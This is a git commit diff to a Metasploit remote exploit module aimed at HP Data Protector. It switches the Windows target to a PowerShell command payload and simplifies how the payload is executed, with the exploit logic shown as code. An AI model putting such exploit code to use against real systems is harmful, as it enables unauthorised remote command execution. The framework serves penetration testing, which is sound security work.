Use ARCH_CMD on Windows target

2014-10-14 10:24:32 -05:00 · 2014-10-14 10:24:32 -05:00 · 39a09ad750
parent a0fc0cf87f
commit 39a09ad750
1 changed files with 11 additions and 5 deletions
--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@ -59,7 +59,13 @@ class Metasploit3 < Msf::Exploit::Remote
          [ 'Windows 64 bits / HP Data Protector 9',
            {
              'Platform' => 'win',
-              'Arch'     => ARCH_X86_64,
+              'Arch'     => ARCH_CMD,
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'powershell'
+                }
+              }
            }
          ]
        ],
@ -114,11 +120,11 @@ class Metasploit3 < Msf::Exploit::Remote
    end

    if target.name =~ /Windows/
-      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
-      print_status("#{peer} - Exploiting through Powershell...")
-      execute_windows(command, dir)
+      #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+      print_status("#{peer} - Executing payload...")
+      execute_windows(payload.encoded, dir)
    else
-      print_status("#{peer} - Exploiting payload...")
+      print_status("#{peer} - Executing payload...")
      execute_linux(payload.encoded, dir)
    end
  end